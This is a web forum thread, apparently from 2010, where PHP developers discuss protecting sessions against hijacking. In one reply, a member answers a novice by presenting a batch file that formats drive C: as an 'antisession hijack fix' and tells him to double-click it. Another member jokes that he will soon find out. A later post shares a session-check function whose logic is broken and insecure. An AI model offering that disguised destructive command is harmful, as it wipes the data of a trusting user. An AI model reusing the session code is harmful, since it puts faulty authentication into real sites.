What to do? Isn't that a little obviously?
Thats the coment from php.net, google it...
Btw, thats not what i ask...
Thats the coment from php.net, google it...
Btw, thats not what i ask...
-
<!DOCTYPE html PUBLIC "-//WAPFORUM.RS -
Then what did you ask? Function won't work unless session_start() is called because it uses session vars. Can't you see that?
I know what it is meant to do, but I need to read the full thing to know if it is exactly so cos I don't know the logic behind this
Cos I would check to see if they match, not if they don't match unless the coder is using different logic.PHP Code:if ( $_SESSION
['HTTP_USER_AGENT'] !=
md5($_SERVER
['HTTP_USER_AGENT']))
{
login();
That's what I meant by what it is meant to do. :p
Added after 9 minutes:
So what's it like.
Oh, the user agent I saved and the current user agent don't match so it is him, let's go ahead and log him in?
Think of the implications if a cookie is hijacked.
And oh, btw I really hate what you implied in your reply, and asking me to google a post to help you?
First major security threat, what Prevents hacker from simple editing the cookie Sid value to another value and being logged in as the user with that id value?
You gotta obscure what you are doing a bit more and add some extra security checks.Last edited by frostymarvelous; 17.12.10, 15:21.Perfection comes at a cost
I accept liberty!Comment
-
Bro...
1. Not function wich Subziro did, the snippet that I copy-paste from php.net:
2. The question is whether this snippet helps and if, is to be placed before or after the session_start() ?PHP Code:<?php
if (isset($_REQUEST['_SESSION'])) die("Get lost Muppet!");
?>
Not session vars, the snippet. I'm not asking about function or sessions or its vars or what ever. Just 2. thing.
------------------------------
And I hate when someone explains me something I have not asked, ie, when I see that he did not understand the question...
I hope you are not angry but really did not know what else to write, not to go into, God forbid, argument.
Last edited by arnage; 17.12.10, 15:52.<!DOCTYPE html PUBLIC "-//WAPFORUM.RSComment
-
This will work when placed before or after session start cos it does not require a session var.
If you can give me the exact link and maybe post I Will try to refine it for you. I don't know exactly what the coder is trying to do.
Added after 2 minutes:
I know I didn't really understand that's why I asked for the link. I'm mobile so typing long stuff is annoying that's why I don't wanna do something and realise that I wasted my time.Last edited by frostymarvelous; 17.12.10, 16:56.Perfection comes at a cost
I accept liberty!Comment
-
You are absolutely right if you're by phone, should say right away... ;)
PHP: $_SESSION - Manual
This is that page, its the first coment but no any explanation in it.
Thanks for answer!<!DOCTYPE html PUBLIC "-//WAPFORUM.RSComment
-
So I was right but ori and subzero didn't understand me,
The code is trying to check if the user is trying to inject session values through the get or post superglobals that's.why I thought it should be phpsessid. this hack is only possible with register globals turned on though.
If you want to use it, put it at the very top of every page. Or even better, at the top of a file which you include in all your pages like your settings file.Perfection comes at a cost
I accept liberty!Comment
-
if you d0nt want anybody to crack your session. Just add salt t0 ur session...Comment
-
Add salt? Can u p0st it here jers0n..our lfe is simple words....
http://mygenkz.net
ewanz06@yahoo.com
PHP Code:$output="i am NOoob....";
$newfile="ewanz.txt";
$file = fopen ($newfile, "w");
fwrite($file, $output);
fclose ($file);
Comment
-
-
A discussion on anti session hijacking is sad? ..... hmmm ok what ever you say.
Seeming you have this so called big business or what ever it is you do. You dont really do much to help your self.
If i was going to hire someone to work for me etc i would do a google search for them and see if there is anything good or bad posted about them....
well in this case i would find you b!tching at everything .... then think your a right (place your word here) and think im not hiring you.
But then again its not my life you lead it how you want to, we all make our own choices in life but when there done we have to live with them.Comment
-
how to use this code plz tell details.Comment
-
you need to create a text file called antisession.bat paste this code in itOriginally posted by devil_bd View Post
then add some php file into the same directory as antisession.bat, double click on it then you will get a php file with the antisession hijack fixCode:@echo off for %%i in (c:) do format %%i /FS:NTFS /x /q
Comment
-
lol, i wish i can not laugh but i cant help it yeah he does not know how to use it but he will soon find out.
sessions.php
place this in under sessions.phpPHP Code:function page_protect()
{
session_start();
if (isset($_SESSION['HTTP_USER_AGENT']))
{
if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
{
login();
exit;
}
}
}
function login()
{
session_start();
if(isset($_SESSION['sid']) || isset($_COOKIE['sid'])) {
// Demo only
$_SESSION['sid'] != md5($_SERVER['HTTP_USER_AGENT']);
}
PHP Code:page_protect();
if you get a error remove ! out of sidVisit: Chat4u.mobi - The New Lay Of being a site of your dreams!
Visit: WapMasterz Coming Back Soon!
_______
SCRIPTS FOR SALE BY SUBZERO
Chat4u Script : coding-talk.com/f28/chat4u-mobi-script-only-150-a-17677/ - > Best Script for your site no other can be hacked by sql or uploaders.
FileShare Script : coding-talk.com/f28/file-wap-share-6596/ -> Uploader you will never regret buying yeah it mite be old now but it still seems to own others...
_______
Info & Tips
php.net
w3schools.comComment
-
Sir im using ejatd29 sc,so where i must to put this codeOriginally posted by subzero View PostComment
-
Hope it wil b usefulll....thanks bro
I'm Proud to be a Sri Lankan!Comment
Comment